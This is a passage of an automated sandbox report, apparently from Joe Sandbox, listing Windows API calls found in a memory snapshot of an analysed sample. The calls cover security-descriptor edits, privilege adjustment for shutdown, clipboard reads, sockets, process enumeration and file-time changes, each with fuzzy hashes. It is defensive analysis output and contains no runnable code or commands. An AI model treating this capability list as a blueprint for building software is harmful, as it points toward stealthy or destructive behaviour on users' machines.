                                                                              • Part of subcall function 004392BC: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0043930B
                                                                              • Part of subcall function 0043928B: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004392A5
                                                                            • GetSecurityDescriptorDacl.ADVAPI32(?,00000004,?,?,?,?), ref: 00445E4B
                                                                            • _memset.LIBCMT ref: 00445E61
                                                                            • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00445E83
                                                                            • GetLengthSid.ADVAPI32(?), ref: 00445E92
                                                                            • GetAce.ADVAPI32(?,00000000,?,?,00000018), ref: 00445EDE
                                                                            • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00445EFB
                                                                            • GetLengthSid.ADVAPI32(?,?,00000018), ref: 00445F11
                                                                            • GetLengthSid.ADVAPI32(?,00000008,?,?,00000000,?,00000000), ref: 00445F39
                                                                            • CopySid.ADVAPI32(00000000,?,00000000,?,00000000), ref: 00445F40
                                                                            • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?,?,00000000,?,00000000), ref: 00445F6E
                                                                            • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000,?,00000000,?,00000000), ref: 00445F8B
                                                                            • SetUserObjectSecurity.USER32(?,?,?), ref: 00445FA0
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                            • String ID:
                                                                            • API String ID: 3490752873-0
                                                                            • Opcode ID: b11fc48791dee11005ef1ac308328aec1e94b5ee495351b15ab77ecbbd68b2cc
                                                                            • Instruction ID: 491154c1e478dcf6c9ac3cbca3c2c9e2645d4ee7bbdc2abf5fae4ada557f6fe4
                                                                            • Opcode Fuzzy Hash: b11fc48791dee11005ef1ac308328aec1e94b5ee495351b15ab77ecbbd68b2cc
                                                                            • Instruction Fuzzy Hash: 85519D71108301ABD610DF61CD84E6FB7E9AFC9B04F04491EFA869B242D778E909C76B
                                                                            APIs
                                                                            • OleInitialize.OLE32(00000000), ref: 0047AA03
                                                                            • CLSIDFromProgID.OLE32(00000000,?), ref: 0047AA27
                                                                            • CoCreateInstance.OLE32(?,00000000,00000005,004829C0,?), ref: 0047AAAA
                                                                            • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 0047AB6B
                                                                            • _memset.LIBCMT ref: 0047AB7C
                                                                            • _wcslen.LIBCMT ref: 0047AC68
                                                                            • _memset.LIBCMT ref: 0047ACCD
                                                                            • CoCreateInstanceEx.OLE32 ref: 0047AD06
                                                                            • CoSetProxyBlanket.OLE32(004829D0,?,?,?,?,?,?,00000800), ref: 0047AD53
                                                                            Strings
                                                                            • NULL Pointer assignment, xrefs: 0047AD84
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: CreateInitializeInstance_memset$BlanketFromProgProxySecurity_wcslen
                                                                            • String ID: NULL Pointer assignment
                                                                            • API String ID: 1588287285-2785691316
                                                                            • Opcode ID: 40e9c8eb680feb4042e694522f3113d29542bf103086fe34e1494599e09369de
                                                                            • Instruction ID: 16786b45dbc5194aa398acfc0f0ff3b91b98a178c64a073a91da7f4e0cb75f58
                                                                            • Opcode Fuzzy Hash: 40e9c8eb680feb4042e694522f3113d29542bf103086fe34e1494599e09369de
                                                                            • Instruction Fuzzy Hash: 54B10DB15083409FD320EF65C881B9FB7E8BBC8744F108E2EF58997291D7759948CB66
                                                                            APIs
                                                                            • GetCurrentProcess.KERNEL32(00000028,?), ref: 004364B9
                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 004364C0
                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004364D6
                                                                            • AdjustTokenPrivileges.ADVAPI32 ref: 004364FE
                                                                            • GetLastError.KERNEL32 ref: 00436504
                                                                            • ExitWindowsEx.USER32(?,00000000), ref: 00436527
                                                                            • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000001), ref: 00436557
                                                                            • SetSystemPowerState.KERNEL32 ref: 0043656A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: ProcessSystemToken$AdjustCurrentErrorExitInitiateLastLookupOpenPowerPrivilegePrivilegesShutdownStateValueWindows
                                                                            • String ID: SeShutdownPrivilege
                                                                            • API String ID: 2938487562-3733053543
                                                                            • Opcode ID: 9f228ad1da6a4c81f8cb5394189ecc1147849337ed66d96e43b1ced3868a671c
                                                                            • Instruction ID: b625d7910520021a286729d09db348b3c4b0b131b75d5259d4bd29649b467962
                                                                            • Opcode Fuzzy Hash: 9f228ad1da6a4c81f8cb5394189ecc1147849337ed66d96e43b1ced3868a671c
                                                                            • Instruction Fuzzy Hash: E021D5B02803017FF7149B64DD4AF6B3398EB48B10F948829FE09852D2D6BDE844973D
                                                                            APIs
                                                                            • __swprintf.LIBCMT ref: 00436162
                                                                            • __swprintf.LIBCMT ref: 00436176
                                                                              • Part of subcall function 0041353A: __woutput_l.LIBCMT ref: 0041358F
                                                                            • __wcsicoll.LIBCMT ref: 00436185
                                                                            • FindResourceW.KERNEL32(?,?,0000000E), ref: 004361A6
                                                                            • LoadResource.KERNEL32(?,00000000), ref: 004361AE
                                                                            • LockResource.KERNEL32(00000000), ref: 004361B5
                                                                            • FindResourceW.KERNEL32(?,?,00000003), ref: 004361DA
                                                                            • LoadResource.KERNEL32(?,00000000), ref: 004361E4
                                                                            • SizeofResource.KERNEL32(?,00000000), ref: 004361F0
                                                                            • LockResource.KERNEL32(?), ref: 004361FD
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Resource$FindLoadLock__swprintf$Sizeof__wcsicoll__woutput_l
                                                                            • String ID:
                                                                            • API String ID: 2406429042-0
                                                                            • Opcode ID: c1b2c305ea449a9eaa2c50be24a6d356ee30b865a6e7eb3c9e4c44cc17d92184
                                                                            • Instruction ID: 79d88324f8a28cdfdddc37bd7103cac5134eefaeeaedb246b69d205017f9fa0d
                                                                            • Opcode Fuzzy Hash: c1b2c305ea449a9eaa2c50be24a6d356ee30b865a6e7eb3c9e4c44cc17d92184
                                                                            • Instruction Fuzzy Hash: 82313432104210BFD700EF64ED88EAF77A9FB89304F00882BFA4196150E778D940CB68
                                                                            APIs
                                                                            • SetErrorMode.KERNEL32(00000001), ref: 0045D522
                                                                            • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,?), ref: 0045D593
                                                                            • GetLastError.KERNEL32 ref: 0045D59D
                                                                            • SetErrorMode.KERNEL32(?), ref: 0045D629
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Error$Mode$DiskFreeLastSpace
                                                                            • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                            • API String ID: 4194297153-14809454
                                                                            • Opcode ID: 49e0e17e9479d30b414134c7f78092e00673ae1a45d158f41d80208550ba4cb8
                                                                            • Instruction ID: 49a1caac5541b587bc648ef7caa6256b54369420b38b3993b587487a6931f65b
                                                                            • Opcode Fuzzy Hash: 49e0e17e9479d30b414134c7f78092e00673ae1a45d158f41d80208550ba4cb8
                                                                            • Instruction Fuzzy Hash: BA31AD75A083009FC310EF55D98090BB7E1AF89315F448D6FF94997362D778E9068B6A
                                                                            APIs
                                                                            • MkParseDisplayName.OLE32(?,00000000,?,?), ref: 0047AF0F
                                                                              • Part of subcall function 004781AE: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000000,NULL Pointer assignment,00000001), ref: 00478201
                                                                              • Part of subcall function 004781AE: VariantCopy.OLEAUT32(?,?), ref: 00478259
                                                                              • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000058,?), ref: 00478270
                                                                              • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000078,?), ref: 00478287
                                                                            • OleInitialize.OLE32(00000000), ref: 0047AE06
                                                                              • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                                                              • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                                                            • _wcslen.LIBCMT ref: 0047AE18
                                                                            • CreateBindCtx.OLE32(00000000,?), ref: 0047AEC2
                                                                            • CLSIDFromProgID.OLE32(00000000,?), ref: 0047AFCC
                                                                            • GetActiveObject.OLEAUT32(?,00000000,?), ref: 0047AFF9
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: CopyVariant$_wcslen$ActiveBindCreateDisplayErrorFromInitializeLastNameObjectParseProg_wcscpy
                                                                            • String ID: HH
                                                                            • API String ID: 1915432386-2761332787
                                                                            • Opcode ID: e5cc958d5f324366fbee3d2ecbe33304f19c15b46d8e68c756c5eb73bbadfcb0
                                                                            • Instruction ID: 7e3b4e38c6064d991530b19baaff212313fd3e9d55f264e0ba959e8ba912c45c
                                                                            • Opcode Fuzzy Hash: e5cc958d5f324366fbee3d2ecbe33304f19c15b46d8e68c756c5eb73bbadfcb0
                                                                            • Instruction Fuzzy Hash: 6C915C71604301ABD710EB65CC85F9BB3E8AFC8714F10892EF64597291EB78E909CB5A
                                                                            APIs
                                                                            • socket.WSOCK32(00000002,00000001,00000006,?,00000000), ref: 004648B0
                                                                            • WSAGetLastError.WSOCK32(00000000,00000002,00000001,00000006,?,00000000), ref: 004648BE
                                                                            • bind.WSOCK32(00000000,?,00000010,00000002,00000001,00000006,?,00000000), ref: 004648DA
                                                                            • WSAGetLastError.WSOCK32(00000000,00000000,?,00000010,00000002,00000001,00000006,?,00000000), ref: 004648E6
                                                                            • closesocket.WSOCK32(00000000,00000000,00000000,00000000,00000005,00000000,?,00000010,00000002,00000001,00000006,?,00000000), ref: 0046492D
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast$bindclosesocketsocket
                                                                            • String ID:
                                                                            • API String ID: 2609815416-0
                                                                            • Opcode ID: f055706b1daf61e2065e9fedb91be4565bf8eae27f8502184711caae908a2a6c
                                                                            • Instruction ID: d240999dee57073d64b91b26c15bb406cb7727aead8f71c00845428af50f987f
                                                                            • Opcode Fuzzy Hash: f055706b1daf61e2065e9fedb91be4565bf8eae27f8502184711caae908a2a6c
                                                                            • Instruction Fuzzy Hash: C731CB712002009BD710FF2ADC81B6BB3E8EF85724F144A5FF594A72D2D779AC85876A
                                                                            APIs
                                                                            • CreateToolhelp32Snapshot.KERNEL32 ref: 00437043
                                                                            • Process32FirstW.KERNEL32(00000000,00000002), ref: 00437050
                                                                            • Process32NextW.KERNEL32(00000000,?), ref: 00437075
                                                                            • __wsplitpath.LIBCMT ref: 004370A5
                                                                              • Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2
                                                                            • _wcscat.LIBCMT ref: 004370BA
                                                                            • __wcsicoll.LIBCMT ref: 004370C8
                                                                            • CloseHandle.KERNEL32(00000000), ref: 00437105
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
                                                                            • String ID:
                                                                            • API String ID: 2547909840-0
                                                                            • Opcode ID: fd838752e9d0606085fad0ec29118efadb7b5f17250a81beb0a2f2c9513d2e10
                                                                            • Instruction ID: d866d71778569fbbd99b025f777f77cc3db9ba9c83dfb601fa45888e96c7797d
                                                                            • Opcode Fuzzy Hash: fd838752e9d0606085fad0ec29118efadb7b5f17250a81beb0a2f2c9513d2e10
                                                                            • Instruction Fuzzy Hash: 9C21A7B20083819BD735DB55C881BEFB7E8BB99304F00491EF5C947241EB79A589CB6A
                                                                            APIs
                                                                              • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                            • FindFirstFileW.KERNEL32(?,?,?,?,?,00000000), ref: 0045217E
                                                                            • Sleep.KERNEL32(0000000A,?,?,00000000), ref: 004521B2
                                                                            • FindNextFileW.KERNEL32(?,?,?,00000000), ref: 004522AC
                                                                            • FindClose.KERNEL32(?,?,00000000), ref: 004522C3
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Find$File$CloseFirstNextSleep_wcslen
                                                                            • String ID: *.*
                                                                            • API String ID: 2693929171-438819550
                                                                            • Opcode ID: 17936c38af85c1dbfc3d1ebbd0b26446ca2a596e07a4ad84d79ac0689e190811
                                                                            • Instruction ID: e6452ff64139cddd5fd774ab19bf2199aa97b2a19dc0f7115334900b47d689b2
                                                                            • Opcode Fuzzy Hash: 17936c38af85c1dbfc3d1ebbd0b26446ca2a596e07a4ad84d79ac0689e190811
                                                                            • Instruction Fuzzy Hash: BD419D756083409FC314DF25C984A9FB7E4BF86305F04491FF98993291DBB8E949CB5A
                                                                            APIs
                                                                            • OpenClipboard.USER32(?), ref: 0046C635
                                                                            • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046C643
                                                                            • GetClipboardData.USER32 ref: 0046C64F
                                                                            • CloseClipboard.USER32 ref: 0046C65D
                                                                            • GlobalLock.KERNEL32(00000000), ref: 0046C688
                                                                            • CloseClipboard.USER32 ref: 0046C692
                                                                            • IsClipboardFormatAvailable.USER32(00000001), ref: 0046C6D5
                                                                            • GetClipboardData.USER32 ref: 0046C6DD
                                                                            • GlobalLock.KERNEL32(00000000), ref: 0046C6EE
                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 0046C726
                                                                            • CloseClipboard.USER32 ref: 0046C866
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Clipboard$CloseGlobal$AvailableDataFormatLock$OpenUnlock
                                                                            • String ID: HH
                                                                            • API String ID: 589737431-2761332787
                                                                            • Opcode ID: 76419e0badb028214ed7bad9e924c36871e80023f9f647d131bfc03e45e064d3
                                                                            • Instruction ID: 5556deb4c8197336e1b92b5e2a85e957832ef7964462d916cb468ff193882e13
                                                                            • Opcode Fuzzy Hash: 76419e0badb028214ed7bad9e924c36871e80023f9f647d131bfc03e45e064d3
                                                                            • Instruction Fuzzy Hash: 7301F5762042005FC300AFB9ED45B6A7BA4EF59704F04097FF980A72C1EBB1E915C7AA
                                                                            APIs
                                                                            • __wcsicoll.LIBCMT ref: 0043643C
                                                                            • mouse_event.USER32(00000800,00000000,00000000,00000078,00000000), ref: 00436452
                                                                            • __wcsicoll.LIBCMT ref: 00436466
                                                                            • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 0043647C
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: __wcsicollmouse_event
                                                                            • String ID: DOWN
                                                                            • API String ID: 1033544147-711622031
                                                                            • Opcode ID: 8e71a22f1bb6dc727f393f419cee3c46fab46d9365d91d475c80ba63e0095046
                                                                            • Instruction ID: 8a73d33e481528181e274ae5662561dddcd8f7088196b39fde8242b6fe69d79f
                                                                            • Opcode Fuzzy Hash: 8e71a22f1bb6dc727f393f419cee3c46fab46d9365d91d475c80ba63e0095046
                                                                            • Instruction Fuzzy Hash: 75E0927558872039FC4036253C02FFB174CAB66796F018116FE00D1291EA586D865BBD
                                                                            APIs
                                                                              • Part of subcall function 004647A2: inet_addr.WSOCK32(?), ref: 004647C7
                                                                            • socket.WSOCK32(00000002,00000002,00000011,?,00000000), ref: 00474213
                                                                            • WSAGetLastError.WSOCK32(00000000), ref: 00474233
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLastinet_addrsocket
                                                                            • String ID:
                                                                            • API String ID: 4170576061-0
                                                                            • Opcode ID: c11ce247c64ee683b380b6a697379cd3ea863651eb179087c325b129d43524e0
                                                                            • Instruction ID: 44a7e99483396e6262e636993c5e510db402c36a24f0b6146f21617b09e75fab
                                                                            • Opcode Fuzzy Hash: c11ce247c64ee683b380b6a697379cd3ea863651eb179087c325b129d43524e0
                                                                            • Instruction Fuzzy Hash: B6412C7164030067E720BB3A8C83F5A72D89F40728F144D5EF954BB2C3D6BAAD45475D
                                                                            APIs
                                                                            • GetCursorPos.USER32(004A83D8), ref: 0045636A
                                                                            • ScreenToClient.USER32(004A83D8,?), ref: 0045638A
                                                                            • GetAsyncKeyState.USER32 ref: 004563D0
                                                                            • GetAsyncKeyState.USER32 ref: 004563DC
                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00456430
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: AsyncState$ClientCursorLongScreenWindow
                                                                            • String ID:
                                                                            • API String ID: 3539004672-0
                                                                            • Opcode ID: 8b6f1a7d11e91e3692d621cb91ecba55955a7a9a0de246f0cd2a62484a80ce0b
                                                                            • Instruction ID: 0eacbf52c9ff4b21db6d2500407d28a57be55752a0539e191fb639d8ee6a043b
                                                                            • Opcode Fuzzy Hash: 8b6f1a7d11e91e3692d621cb91ecba55955a7a9a0de246f0cd2a62484a80ce0b
                                                                            • Instruction Fuzzy Hash: 8E416071108341ABD724DF55CD84EBBB7E9EF86725F540B0EB8A543281C734A848CB6A
                                                                            APIs
                                                                              • Part of subcall function 0046DD22: IsWindow.USER32(00000000), ref: 0046DD51
                                                                            • IsWindowVisible.USER32 ref: 00477314
                                                                            • IsWindowEnabled.USER32 ref: 00477324
                                                                            • GetForegroundWindow.USER32 ref: 00477331
                                                                            • IsIconic.USER32 ref: 0047733F
                                                                            • IsZoomed.USER32 ref: 0047734D
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                            • String ID:
                                                                            • API String ID: 292994002-0
                                                                            • Opcode ID: 1c24098bd8cb9da3f496229370c910df04dc27541171caa4f2956f9c30b83eee
                                                                            • Instruction ID: c753cb395bd8887e5e04db90522a3107d7308fd2cfa588f53a4db7a4177bc043
                                                                            • Opcode Fuzzy Hash: 1c24098bd8cb9da3f496229370c910df04dc27541171caa4f2956f9c30b83eee
                                                                            • Instruction Fuzzy Hash: 351172327041119BE3209B26DD05B9FB7A8AF91310F05882EFC49E7250D7B8EC42D7A9
                                                                            APIs
                                                                            • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00436D4F
                                                                            • SetFileTime.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000), ref: 00436D8C
                                                                            • CloseHandle.KERNEL32(00000000), ref: 00436D93
                                                                            Similarity
                                                                            • API ID: File$CloseCreateHandleTime
                                                                            • String ID:
                                                                            • API String ID: 3397143404-0
                                                                            • Opcode ID: 17e11168520f802dddbe8c477e19047108492bf153e6cd976562f268bfda3e60
                                                                            • Instruction ID: bce1a9391340f9688fe0750810cd2cb1b104417d8b3c1e96578cdf6de8724fbd
                                                                            • Opcode Fuzzy Hash: 17e11168520f802dddbe8c477e19047108492bf153e6cd976562f268bfda3e60
                                                                            • Instruction Fuzzy Hash: A4F0C83634132077E5301A69AC8DFCF276CABDAB32F20452EF741A61C083D51445977D
                                                                            Strings
                                                                            • VUUU, xrefs: 00446968
                                                                            • VUUU, xrefs: 004469C7
                                                                            • VUUU, xrefs: 00446942
                                                                            • 92bc94a96292cfcabd1d0ed0a37f7e0e80fc022afa8dc8820841825def0359945114e2a4cdba1f0312b27aa1b0e695cc0112e585ba133b81cbde9596d767d6a66e, xrefs: 0044681F
                                                                            • ERCP, xrefs: 0044664A
